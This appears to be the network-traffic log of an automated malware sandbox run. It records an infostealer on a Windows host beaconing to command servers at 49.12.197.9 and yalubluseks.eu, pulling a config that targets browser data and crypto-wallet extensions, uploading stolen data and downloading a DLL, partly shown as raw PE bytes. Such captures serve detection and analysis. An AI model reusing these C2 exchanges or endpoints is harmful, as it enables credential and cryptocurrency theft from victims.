2024-10-02 07:43:09 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:43:10 UTC	605	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okdbUPR6IDFoKcPn4Sx4G9Z8yj6YANy4na%2BvXhmSTB3GkXFIrUnFmI5TmxtaTViAKOkaGdKmGlZwLET1pj5enfUq5FVpIHSqOmbYZRB%2FIpJuYHzlCQ0JfkH85JNagzdZdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f54dae11891-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49862	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:09 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:09 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 2d 2d 0d Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749-a33c7340-61ca------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HCBAKJEHDBGHIEBGCGDG--
2024-10-02 07:43:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:10 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 33 37 38 61 63 39 39 64 35 39 32 64 62 64 37 30 37 61 32 63 63 38 37 32 33 39 65 61 62 30 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|e378ac99d592dbd707a2cc87239eab0e\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49865	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:10 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:11 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:43:11 UTC	605	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6DTPDpGXVwO08xsRQU896og7crGdBifk0ZlOC2a7qA9vusuUBI6WTxoGGohpmBYMylSEyQ2onRJTRBpBPfaojvfjrjkh%2BA3JDWnoYJUOrz6FjinnhZwMy%2B5SIxcakdzgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f5e49904217-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49864	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:11 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:11 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 33 37 38 61 63 39 39 64 35 39 32 64 62 64 37 30 37 61 32 63 63 38 37 32 33 39 65 61 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"e378ac99d592dbd707a2cc87239eab0e------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CBKJJEHCBAKFBFHJKFBKCont
2024-10-02 07:43:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:11 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49866	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:12 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:43:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:12 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:43:12 UTC	611	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDfTM7rqOl1GUBMSSpebtcR2nlxh8mBs5H9RLsb7ZI3A3e9g%2BFRlb7Ds5z3%2FgxOsLSu2ymSJL3cN8UOfy%2BYyTi2I2miLKhvf1yj%2BrusC%2BYImd2iTqhJsgSEELH5ofpWgbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f6629435e5f-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49867	49.12.197.9	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:12 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:12 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 33 37 38 61 63 39 39 64 35 39 32 64 62 64 37 30 37 61 32 63 63 38 37 32 33 39 65 61 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="token"e378ac99d592dbd707a2cc87239eab0e------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AAFBAKECAEGCBFIEGDGICont
2024-10-02 07:43:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:13 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49869	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:13 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:13 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:43:14 UTC	641	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLS1jF7wG9HZCT0RWHzgm9lybOpsq3h%2FsUBfwzG3M5KrA%2F3I02F%2BxHJL77I8HiCway9EUd8KWpYzetsKuDnMd%2BwWmEc7HhkZVSRU6piav%2F8vF9xu7YXyYPTI42v1sVtFrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f6e9cb9433d-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49870	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:13 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:13 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 33 37 38 61 63 39 39 64 35 39 32 64 62 64 37 30 37 61 32 63 63 38 37 32 33 39 65 61 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"e378ac99d592dbd707a2cc87239eab0e------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AKECBFBAEBKJJJJKFCGCCont
2024-10-02 07:43:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:14 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49872	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:15 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:15 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:43:15 UTC	619	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqvc3%2BxX19V0kqhf32ARYJFLN1Cr0BOIZKV%2Bd%2BCjlvdXeQCQDBL56M0SWZIDzHch%2By%2F83WEs%2BYWxbTu1I2%2FEbppDLuqqQPDF4U8GYEqNQ0c0%2FolIyBCiTVLIU14T%2BMWK1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f778dcc4225-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49873	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:15 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 6089 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:15 UTC	6089	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 33 37 38 61 63 39 39 64 35 39 32 64 62 64 37 30 37 61 32 63 63 38 37 32 33 39 65 61 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"e378ac99d592dbd707a2cc87239eab0e------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HIIIEGDBKJKEBGCBAFCFCont
2024-10-02 07:43:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49874	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:16 UTC	192	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:16 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:16 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:43:16 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:43:16 UTC	16120	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-10-02 07:43:16 UTC	16384	IN	Data Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-10-02 07:43:16 UTC	16384	IN	Data Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
